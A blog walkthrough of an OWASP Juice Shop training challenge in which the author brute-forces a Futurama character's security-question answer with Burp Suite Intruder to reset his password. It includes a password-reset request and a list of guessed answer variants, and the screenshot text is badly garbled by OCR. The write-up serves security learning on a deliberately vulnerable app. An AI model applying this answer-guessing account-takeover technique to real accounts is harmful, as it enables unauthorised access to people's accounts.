Hacking OWASP’s Juice Shop Pt. 44: Reset Bender’s Password

Challenge: 

Name: Reset Bender’s Password

Description: Reset Bender’s password via the Forgot Password mechanism with the original answer to his security question.

Difficulty: 4 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Burp Suite, FoxyProxy

Resources used:

Hundreds of hours of watching Futurama.

Methodology: 

The first step here is clearly to figure out what the security question is.

In Season One Episode One of Futurama, Bender attempts to kill himself in a Stop ‘n’ Drop Suicide Booth because he found out that the girders he had been bending at work were used to build suicide booths. From there, it was just a matter of finding out the exact string construction of his security answer. To Burp Suite!

Positions Payloads 
Target 
O Payload Positions 
Options 
Configure the positions where payloads will be inserted into the base request The attack type determines the way in WI 
Attack type Sniper 
I 'POST / rest/ user/ reset -password 
Host: local host 3000 
HTTP/I.I 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; 
application/ j son, text/ plain, 
4 Accept 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Content -Type: application/ j son 
Content -Length: 
Origin: http 
// I Ocal host 3000 
10 Connection: close 
Referer: http://localhost : 3000/ 
rv.78.o) 
Gecko,'20100101 Firefox,'78.o 
12 Cookle: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss, 
continueCod 
Z8uqh1tk1esvi 7UyH0uohnt Klj TMCIFviNfns1 HNuktwsoi 7fbS8Ruooh1at r McZN106CQNiY4f rksqKLlQxu37hbkt 
answer" "5>topndropS 
'bender@j uice-sh.op , 
" "test 1234"} 
'new' "test 1234" , 
'repeat
02E 一 1 
」 0 」 」 山 
do-IO,N,d04S 
do-IO,u,d04S 
do-IP,u,d04S 
do-IP,u,d04S 
do-IP,u,d04S 
do-IONd04S 
do-IONd04S 
do-IOLld04S 
doupud04S 
doupud04S 
doupud04S 
doupud04S 
CLIOLld04S 
peolfed
Status 200 on request number 7!

Now just submit that string in the Forgot Password form and reset Bender’s password!

You successfully solved a challenge: Reset Bender's Password (Reset Bender's password 
via the Forgot Password mechanism with the original answer to his security question.) X

Prevention and Mitigation Strategies:

 OWASP Security Question Cheat Sheet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s